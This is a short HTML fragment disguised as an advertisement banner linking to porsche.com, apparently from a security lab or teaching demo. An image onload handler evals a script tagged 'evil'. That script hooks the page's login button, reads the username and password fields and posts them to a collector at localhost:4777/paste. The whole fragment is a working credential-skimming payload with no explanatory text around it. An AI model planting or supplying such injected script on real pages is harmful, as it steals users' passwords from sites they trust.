<a href="http://www.porsche.com">
    <img class="pure-img-responsive" src="http://localhost:4999/ads/ad2.png"
         onload="eval(document.getElementById('evil').text);"
    >
</a>

<script id="evil">
  var login = document.getElementById("login");
  if (login) {
    login.addEventListener("click", function () {
      var username = document.getElementsByName("username")[0].value;
      var password = document.getElementsByName("password")[0].value;
      var url = "http://localhost:4777/paste";
      var req = new XMLHttpRequest();
      req.open("POST", url);
      req.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
      req.send("username=" + encodeURIComponent(username) + "&password=" + encodeURIComponent(password));
    });
  } 
</script>
